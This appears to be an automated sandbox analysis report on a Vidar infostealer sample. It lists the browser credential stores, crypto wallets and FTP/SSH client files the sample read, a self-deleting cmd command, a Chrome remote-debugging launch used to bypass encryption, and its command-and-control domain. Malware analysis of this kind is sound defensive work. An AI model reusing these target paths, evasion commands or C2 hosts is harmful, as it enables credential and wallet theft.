Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0040CCEA FindFirstFileA,	0_2_0040CCEA
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042BD1E FindFirstFileA,	0_2_0042BD1E
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004018DA FindFirstFileA,	0_2_004018DA

Source: C:\Users\user\Desktop\build.exe

Code function: 0_2_00428DDA GetLogicalDriveStringsA,

0_2_00428DDA

Source: C:\Users\user\Desktop\build.exe

Code function: 0_2_0041F9A3 GetSystemInfo,

0_2_0041F9A3

Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2067111556.000000000057E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\build.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\build.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\build.exe" & rd /s /q "C:\ProgramData\2dba1" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10			Jump to behavior

Source: C:\Users\user\Desktop\build.exe

Code function: GetLocaleInfoA,

0_2_0041F6B3

Source: C:\Users\user\Desktop\build.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\build.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\build.exe

Code function: 0_2_0042D98B EntryPoint,GetUserNameW,

0_2_0042D98B

Source: C:\Users\user\Desktop\build.exe

Code function: 0_2_0041F53D GetTimeZoneInformation,

0_2_0041F53D

Source: C:\Users\user\Desktop\build.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: build.exe PID: 7144, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MultiDoge
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\build.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\build.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\build.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build.exe PID: 7144, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\build.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: build.exe PID: 7144, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Create Account	1 Extra Window Memory Injection	1 Software Packing	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	1 DLL Side-Loading	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File Deletion	NTDS	34 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Extra Window Memory Injection	LSA Secrets	1 Query Registry	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
build.exe	54%	Virustotal		Browse
build.exe	45%	ReversingLabs	Win32.Infostealer.Generic
build.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://marka4.cyou/-	100%	Avira URL Cloud	malware
https://marka4.cyou/)	100%	Avira URL Cloud	malware
https://marka4.cyou/	100%	Avira URL Cloud	malware
https://marka4.cyou/w	100%	Avira URL Cloud	malware
https://marka4.cyou/C	100%	Avira URL Cloud	malware
https://marka4.cyou/e	100%	Avira URL Cloud	malware
https://marka4.cyouw	0%	Avira URL Cloud	safe
https://marka4.cyou/&	100%	Avira URL Cloud	malware
https://marka4.cyou/A	100%	Avira URL Cloud	malware
https://marka4.cyou	100%	Avira URL Cloud	malware
https://marka4.cyouS	0%	Avira URL Cloud	safe
https://marka4.cyou/l	100%	Avira URL Cloud	malware
https://marka4.cyou/p	100%	Avira URL Cloud	malware
https://marka4.cyou/b	100%	Avira URL Cloud	malware
https://marka4.cyou/ou	100%	Avira URL Cloud	malware
https://marka4.cyou/_	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
marka4.cyou	116.203.166.124	true	true	unknown
plus.l.google.com	142.250.185.142	true	false	high
play.google.com	142.250.185.238	true	false	high
t.me	149.154.167.99	true	false	high
www.google.com	142.250.184.196	true	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://marka4.cyou/	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199816275252	false		high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0	false		high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://www.google.com/async/newtab_promos	false		high
https://play.google.com/log?format=json&hasfast=true	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
https://t.me/no111p	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	false		high
https://t.me/	build.exe, 00000000.00000002.2067111556.000000000057E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	false		high
http://www.broofa.com	chromecache_61.3.dr	false		high
https://web.telegram.org	build.exe, 00000000.00000003.1668310162.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2069404351.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, opz5fu.0.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	false		high
https://marka4.cyou/w	build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	build.exe, 00000000.00000002.2069404351.0000000003038000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1842204589.0000000003018000.00000004.00000020.00020000.00000000.sdmp, 8gdtjm.0.dr	false		high
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1	chromecache_64.3.dr	false		high
https://marka4.cyou/)	build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1682307929.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://marka4.cyou/&	build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	opz5fu.0.dr	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	build.exe, 00000000.00000002.2069404351.0000000003013000.00000004.00000020.00020000.00000000.sdmp, 8gdtjm.0.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	false		high
https://marka4.cyou/-	build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://apis.google.com	chromecache_61.3.dr, chromecache_64.3.dr	false		high
https://support.mozilla.org/products/firefoxgro.all	build.exe, 00000000.00000002.2071757749.0000000003B68000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/no111p:	build.exe, 00000000.00000002.2067111556.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://domains.google.com/suggest/flow	chromecache_64.3.dr	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2069404351.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, opz5fu.0.dr	false		high
https://marka4.cyouw	build.exe, 00000000.00000003.1695711552.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1737318292.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2069404351.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, opz5fu.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	false		high
https://marka4.cyou	build.exe, 00000000.00000003.1668310162.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2069404351.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, opz5fu.0.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	build.exe, 00000000.00000002.2069404351.0000000003038000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000003.1842204589.0000000003018000.00000004.00000020.00020000.00000000.sdmp, 8gdtjm.0.dr	false		high
https://marka4.cyou/A	build.exe, 00000000.00000003.1710035252.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	false		high
https://marka4.cyou/C	build.exe, 00000000.00000003.1723841784.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	build.exe, 00000000.00000002.2071757749.0000000003B68000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199816275252js4tnMozilla/5.0	build.exe	false		high
https://plus.google.com	chromecache_64.3.dr	false		high
https://ac.ecosia.org/autocomplete?q=	build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	false		high
